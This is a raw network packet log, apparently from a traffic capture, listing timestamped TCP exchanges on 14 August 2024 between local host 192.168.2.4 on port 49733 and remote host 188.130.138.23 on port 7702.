                                Aug 14, 2024 22:24:13.684747934 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684760094 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684767008 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.684787989 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684799910 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684801102 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.684834003 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.684845924 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684859037 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684866905 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.684899092 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684900999 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.684911013 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684943914 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.684943914 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684952021 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.684957981 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.684992075 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685012102 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685034990 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685046911 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685094118 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685120106 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685169935 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685170889 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685218096 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685314894 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685328960 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685364962 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685376883 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685453892 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685467005 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685507059 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685590982 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685604095 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685615063 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685626030 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685637951 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685650110 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685653925 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685678959 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685698986 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685729027 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685740948 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685751915 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685764074 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685776949 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685789108 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685791969 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685806036 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685836077 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685870886 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685883045 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685894012 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685906887 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685919046 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685924053 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685931921 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.685936928 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685971022 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685987949 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.685992002 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686006069 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686017036 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686045885 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686064005 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686146975 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686158895 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686170101 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686192036 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686203957 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686203957 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686217070 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686217070 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686229944 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686243057 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686243057 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686279058 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686295033 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686314106 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686326027 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686336994 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686352015 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686373949 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686377048 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686388016 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686394930 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686417103 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686435938 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686444998 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686465979 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686491013 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686522007 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686537981 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686549902 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686569929 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686582088 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686589003 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686633110 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686646938 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686661959 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686702967 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686702967 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686717033 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686764002 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686774969 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686815977 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686824083 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686830044 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686863899 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686882019 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.686925888 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686939955 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686952114 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.686989069 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687005997 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687006950 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687052965 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687124014 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687135935 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687148094 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687161922 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687174082 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687187910 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687228918 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687266111 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687278986 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687290907 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687331915 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687424898 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687437057 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687474966 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687479019 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687488079 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687519073 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687534094 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687644005 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687657118 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687696934 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687700033 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687712908 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687755108 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687773943 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687787056 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687822104 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687825918 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687834978 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.687838078 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687864065 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.687891006 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688165903 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688214064 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688220978 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688251972 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688261032 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688299894 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688301086 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688349009 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688361883 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688405991 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688441992 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688455105 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688499928 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688513041 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688519001 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688530922 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688560963 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688565016 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688580036 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688610077 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688637018 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688683033 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688723087 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688735008 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688767910 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688783884 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688796043 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688808918 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688834906 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688847065 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.688849926 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688889980 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688908100 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.688982010 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689033985 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689033985 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689084053 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689127922 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689176083 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689184904 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689198017 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689224005 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689234972 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689245939 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689281940 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689295053 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689307928 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689342976 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689353943 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689354897 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689398050 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689506054 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689517975 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689528942 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689541101 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689563036 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689563036 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689575911 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689580917 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689595938 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689623117 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689644098 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689656973 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689668894 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689691067 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689697981 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689712048 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689743996 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689780951 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689793110 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689838886 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689877987 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689889908 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689928055 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689934015 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.689940929 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689968109 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689980030 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.689985037 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690013885 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690032959 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690035105 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690047026 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690087080 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690133095 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690145969 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690165997 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690186977 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690197945 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690207005 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690249920 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690299988 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690311909 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690346956 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690351009 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690387011 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690391064 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690440893 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690444946 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690454006 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690486908 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690505981 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690520048 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690571070 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690614939 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690628052 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690639019 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690665007 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690686941 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690721989 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690735102 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690762043 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690773010 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690773964 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690809965 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690829039 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690850973 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690864086 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690892935 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690903902 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690906048 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690937996 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690968037 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.690978050 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.690980911 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691005945 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691042900 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691046000 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691061020 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691081047 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691092014 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691097975 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691121101 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691144943 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691169024 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691181898 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691210032 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691221952 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691221952 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691253901 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691272020 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691355944 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691369057 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691379070 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691390991 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691402912 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691411972 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691416979 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691426039 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691430092 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691452026 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691464901 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691466093 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691478014 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691487074 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691500902 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691524982 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691550970 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691555977 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691564083 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691584110 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691597939 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691603899 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691617012 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691653013 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691673994 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691687107 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691718102 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691730022 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691764116 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691767931 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691781998 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691809893 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691819906 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691840887 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691847086 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691859961 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691870928 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691898108 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691921949 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691934109 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691972971 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.691975117 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.691988945 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692023039 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692024946 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.692040920 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.692065954 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.692092896 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692142010 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.692214966 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692228079 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692239046 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692250967 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692260981 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.692274094 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.692296028 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.692308903 CEST770249733188.130.138.23192.168.2.4
